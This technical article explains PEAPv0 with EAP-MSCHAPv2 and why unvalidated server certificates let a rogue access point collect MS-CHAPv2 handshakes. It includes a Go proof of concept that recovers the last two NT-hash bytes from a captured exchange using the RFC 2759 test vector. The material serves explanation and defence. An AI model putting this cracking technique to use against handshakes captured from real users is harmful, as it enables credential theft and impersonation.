Protected Extensible Authentication Protocol - PEAPv0 With EAP-MSCHAPv2


PEAPv0/EAP-MSCHAPv2 is the most common form of PEAP in use, and is what is usually meant by "PEAP". The inner authentication protocol is Microsoft's Challenge Handshake Authentication Protocol version 2, so it can authenticate against any user database that supports the MS-CHAPv2 format (one that stores the NT hash of the password), including Microsoft NT domains and Microsoft Active Directory.

After EAP-TLS, PEAPv0/EAP-MSCHAPv2 is the second most widely supported EAP standard in the world. Client and server implementations exist from various vendors, including support in all recent releases from Microsoft, Apple and Cisco. Other implementations exist, such as xsupplicant and wpa_supplicant.

As with other 802.1X and EAP types, PEAP can be used to derive dynamic (per-session) link encryption keys: the keying material is taken from the outer TLS tunnel, so the client only obtains link keys after the server has been authenticated and the inner exchange has completed.

Each client must be configured with the CA certificate that issued the authentication server's certificate and must validate the server's certificate against it, including a check that the server name is the expected one (in wpa_supplicant, ca_cert together with domain_match or domain_suffix_match), before it submits credentials inside the tunnel. If the client does not validate the server certificate, it is in general trivial to introduce a fake wireless access point with its own RADIUS server: clients that associate with it complete the PEAP tunnel with the attacker and send their MS-CHAPv2 challenge/response inside it, allowing the attacker to gather MS-CHAPv2 handshakes. MS-CHAPv2 itself is weak: the 24-byte response is the 8-byte challenge encrypted with DES under three keys cut from the 16-byte NT hash of the password (7 + 7 + 2 bytes, the last zero-padded), so the third key falls to a 2^16 search and the other two to a single 2^56 DES search, independent of password strength. On recent hardware those handshakes can therefore be cracked quickly, and the recovered NT hash is itself sufficient to authenticate as the user with MS-CHAPv2.
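As an added worked example (not code from this page or from any PEAP implementation), the Go program below implements the MS-CHAPv2 NT-Response computation from RFC 2759 against that RFC's published section 9.2 test vector, then plays the rogue-authenticator side: given only the values that cross the link in the clear (both challenges, the user name and the 24-byte response), it recovers the last two bytes of the NT hash with a 2^16 search. Go's standard library has no MD4, so the NT hash of the test password is embedded as a constant taken from the RFC; the remaining 14 hash bytes would need a DES exhaustive search that the program describes but does not run.

```go
package main

import (
	"bytes"
	"crypto/des"
	"crypto/sha1"
	"encoding/hex"
	"fmt"
	"math/bits"
)

// RFC 2759 section 9.2 test vector. ntHash is MD4(UTF-16LE "clientPass"),
// embedded as a constant because Go's standard library has no MD4.
var (
	username      = "User"
	authChallenge = mustHex("5B5D7C7D7B3F2F3E3C2C602132262628")
	peerChallenge = mustHex("21402324255E262A28295F2B3A337C7E")
	ntHash        = mustHex("44EBBA8D5312B8D611474411F56989AE")
)

func mustHex(s string) []byte {
	b, _ := hex.DecodeString(s) // constants above are valid hex
	return b
}

// ChallengeHash (RFC 2759 8.2): first 8 bytes of
// SHA1(PeerChallenge || AuthenticatorChallenge || UserName).
// Every input crosses the link in the clear, so an eavesdropper or a rogue
// authenticator (which chose AuthenticatorChallenge) can compute it too.
func ChallengeHash(peer, auth []byte, user string) []byte {
	h := sha1.New()
	h.Write(peer)
	h.Write(auth)
	h.Write([]byte(user))
	return h.Sum(nil)[:8]
}

// desKeyFrom7 spreads a 56-bit key over 8 bytes, 7 bits per byte, and sets
// the odd-parity bit DES expects in each low bit (Go's DES ignores it).
func desKeyFrom7(k7 []byte) []byte {
	key := make([]byte, 8)
	for i := 0; i < 8; i++ {
		var prev, cur byte
		if i > 0 {
			prev = k7[i-1]
		}
		if i < 7 {
			cur = k7[i]
		}
		key[i] = (prev<<(8-uint(i)) | cur>>uint(i)) & 0xFE
		if bits.OnesCount8(key[i])%2 == 0 {
			key[i] |= 1
		}
	}
	return key
}

// DesEncrypt (RFC 2759 8.6): one DES-ECB block under a 7-byte key.
func DesEncrypt(clear, key7 []byte) []byte {
	c, err := des.NewCipher(desKeyFrom7(key7))
	if err != nil {
		panic(err)
	}
	out := make([]byte, 8)
	c.Encrypt(out, clear)
	return out
}

// ChallengeResponse (RFC 2759 8.5): the 16-byte NT hash is zero-padded to
// 21 bytes and cut into three 7-byte DES keys that each encrypt the same
// challenge. The third key carries only hash bytes 14 and 15.
func ChallengeResponse(challenge, hash []byte) []byte {
	z := make([]byte, 21)
	copy(z, hash)
	resp := make([]byte, 0, 24)
	for i := 0; i < 3; i++ {
		resp = append(resp, DesEncrypt(challenge, z[i*7:i*7+7])...)
	}
	return resp
}

// RecoverHashTail is the attacker's side: from a captured challenge and
// NT-Response, try all 2^16 third keys and return hash bytes 14 and 15.
// The other 14 hash bytes are two 56-bit keys encrypting the same known
// plaintext, so one exhaustive DES search (2^56, not run here) yields both.
func RecoverHashTail(challenge, response []byte) (byte, byte, bool) {
	target := response[16:24]
	k7 := make([]byte, 7)
	for g := 0; g < 1<<16; g++ {
		k7[0], k7[1] = byte(g>>8), byte(g)
		if bytes.Equal(DesEncrypt(challenge, k7), target) {
			return k7[0], k7[1], true
		}
	}
	return 0, 0, false
}

func main() {
	ch := ChallengeHash(peerChallenge, authChallenge, username)
	resp := ChallengeResponse(ch, ntHash)
	fmt.Printf("Challenge: %X\nNT-Response: %X\n", ch, resp)
	b14, b15, ok := RecoverHashTail(ch, resp)
	fmt.Printf("hash[14:16] from 2^16 search: %02X%02X (found=%v)\n", b14, b15, ok)
}
```

The 8-byte Challenge printed for the RFC inputs should be D02E4386BCE91226, matching RFC 2759 section 9.2. Nothing in the program needs the password: a rogue authenticator that captured this exchange through an unvalidated PEAP tunnel recovers hash bytes 14 and 15 in milliseconds, and the full NT hash with a fixed-cost DES search, regardless of how strong "clientPass" is.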
